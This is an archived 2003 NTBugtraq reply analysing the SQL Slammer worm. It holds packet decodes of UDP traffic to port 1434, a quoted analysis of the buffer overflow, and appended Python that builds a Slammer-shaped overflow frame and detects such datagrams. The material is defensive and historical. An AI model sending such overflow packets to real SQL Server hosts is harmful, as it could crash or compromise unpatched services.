Re: W32/SQLSlammer PACKET CAPTURE
From: Graham Rose (graham@AVINT.NET)
Date: 01/25/03
- Previous message: Marc Maiffret: "SQL Sapphire Worm Analysis"
- In reply to: Russ: "W32/SQLSlammer"
- Next in thread: Russ: "Re: W32/SQLSlammer"
Date: Sat, 25 Jan 2003 10:50:54 -0330
From: Graham Rose <graham@AVINT.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Looks like I may have a packet capture of this. See below (IPs anonymised).

Does anyone else have a packet capture to compare?

Note that it looks like it's calling specific DLLs and system calls.
--
Graham Rose, CCNA
Network Administrator
Avalon InterConnect & Infotech Canada
graham@infotechcanada.com
graham@avint.net
http://www.avint.net
http://www.superweb.ca
http://www.infotechcanada.com

Frame 2 (418 on wire, 418 captured)
    Arrival Time: Jan 25, 2003 05:29:20.8317
    Time delta from previous packet: 0.000588 seconds
    Time relative to first packet: 0.000588 seconds
    Frame Number: 2
    Packet Length: 418 bytes
    Capture Length: 418 bytes
Ethernet II
    Destination: 01:00:5e:28:66:b2 (01:00:5e:28:66:b2)
    Source: 00:04:75:96:e1:6e (3_96:e1:6e)
    Type: IP (0x0800)
Internet Protocol
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 404
    Identification: 0xf580
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 1
    Protocol: UDP (0x11)
    Header checksum: 0x6264 (correct)
    Source: xxx.xxx.xxx
    Destination: reserved-multicast-range-NOT-delegated.example.com (231.40.102.178)
User Datagram Protocol
    Source port: 1804 (1804)
    Destination port: 1434 (1434)
    Length: 384
    Checksum: 0xcdca (correct)
Data (376 bytes)

Frame 5 (418 on wire, 418 captured)
    Arrival Time: Jan 25, 2003 05:29:20.8326
    Time delta from previous packet: 0.000141 seconds
    Time relative to first packet: 0.001447 seconds
    Frame Number: 5
    Packet Length: 418 bytes
    Capture Length: 418 bytes
Ethernet II
    Destination: 01:00:5e:5a:09:6f (01:00:5e:5a:09:6f)
    Source: 00:04:75:96:e1:6e (3_96:e1:6e)
    Type: IP (0x0800)
Internet Protocol
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 404
    Identification: 0xf599
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 1
    Protocol: UDP (0x11)
    Header checksum: 0xbb5c (correct)
    Source: xxx.xxx.xxx
    Destination: 235.90.9.111
User Datagram Protocol
    Source port: 1804 (1804)
    Destination port: 1434 (1434)
    Length: 384
    Checksum: 0x26dc (correct)
Data (376 bytes)

On January 25, 2003 09:34 am, you wrote:

I would like to revise my previous statement. W32/SQLSlammer, as it's being called now, does not act like SQL-Spida, and the mitigators to prevent SQL-Spida are not necessarily effective in preventing SQLSlammer. SQLSlammer is delivered entirely in the single connection, 367 bytes of attack code. It appears to be entirely memory resident, iows, it won't drop anything.

It does not appear to take advantage of weak passwords or any stored procedures, it simply overflows the buffer and executes. Also, SQL-Spida attacked 1433, whereas this attacks UDP 1434. If this attack is also employing the SQL Ping bounce described by David Litchfield last July, then this could account for the amount of bandwidth being consumed by this. Look in the NTBugtraq archives for David's email.

There is some discussion occurring that ISPs are blocking this traffic, so we should see recovery relatively quickly. So far there have been no reports of SQL 7 or lower being affected.

More as it's available.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

Delivery co-sponsored by TruSecure Corporation
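As an added example (not part of Graham's or Russ's messages), the Python below builds a frame from the header values in the Frame 2 decode above and shows the structural check a sensor can apply to a datagram of that shape: UDP to 1434, 376 data bytes, request type 0x04 followed by a 96-byte run of 0x01. The source address is a documentation-range placeholder because the message anonymised it, and everything after the 0x01 run is filler rather than the worm's own code.

```python
import struct
from ipaddress import IPv4Address

# Header values from the Frame 2 decode quoted above; IP_SRC is a placeholder (anonymised).
ETH_DST, ETH_SRC = bytes.fromhex("01005e2866b2"), bytes.fromhex("00047596e16e")
IP_SRC, IP_DST = "192.0.2.1", "231.40.102.178"   # 01:00:5e:28:66:b2 is the multicast MAC for IP_DST
IP_ID, IP_TTL, SRC_PORT, SSRS_PORT = 0xF580, 1, 1804, 1434

def ip_checksum(hdr: bytes) -> int:
    """One's-complement IPv4 header checksum; returns 0 when a filled-in header verifies."""
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_udp_frame(payload: bytes, dport: int = SSRS_PORT) -> bytes:
    """Constructed Ethernet/IPv4/UDP frame carrying payload with the capture's header values."""
    udp = struct.pack("!HHHH", SRC_PORT, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), IP_ID, 0, IP_TTL, 17, 0,
                     IPv4Address(IP_SRC).packed, IPv4Address(IP_DST).packed)
    return ETH_DST + ETH_SRC + b"\x08\x00" + ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:] + udp

def build_sample_frame() -> bytes:
    """Frame 2's shape: 376 data bytes, type 0x04, then 96 bytes of 0x01 that overrun the
    name buffer. The remaining 279 bytes are constructed filler, not the worm's code."""
    return build_udp_frame(b"\x04" + b"\x01" * 96 + b"A" * 279)

def parse_udp(frame: bytes):
    """Decode an IPv4/UDP frame into header fields and data; None if malformed."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x00" or frame[14] >> 4 != 4:
        return None
    ihl = (frame[14] & 0x0F) * 4
    ip = frame[14:14 + ihl]
    if ihl < 20 or len(ip) < ihl or ip_checksum(ip) != 0 or ip[9] != 17:
        return None
    udp = frame[14 + ihl:14 + struct.unpack("!H", ip[2:4])[0]]
    if len(udp) < 8 or not 8 <= (ulen := struct.unpack("!H", udp[4:6])[0]) <= len(udp):
        return None
    sport, dport = struct.unpack("!HH", udp[:4])
    return {"src": str(IPv4Address(ip[12:16])), "dst": str(IPv4Address(ip[16:20])),
            "ttl": ip[8], "sport": sport, "dport": dport, "data": udp[8:ulen]}

def is_slammer_like(frame: bytes) -> bool:
    """Flag a UDP datagram to 1434 (SQL Server Resolution Service) whose data starts with
    request type 0x04 and the 96-byte 0x01 run; legitimate SSRS requests are a few bytes."""
    p = parse_udp(frame)
    if p is None or p["dport"] != SSRS_PORT:
        return False
    return len(p["data"]) > 100 and p["data"][:97] == b"\x04" + b"\x01" * 96
```

A single-byte 0x02 ping or a short 0x04 instance-name lookup to 1434 passes the check, and the same oversized payload to any other port is ignored, so the rule keys on the overflow shape rather than on port 1434 traffic alone.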
- Next message: Ivan Mason: "Re: MS SQL Server Worm?"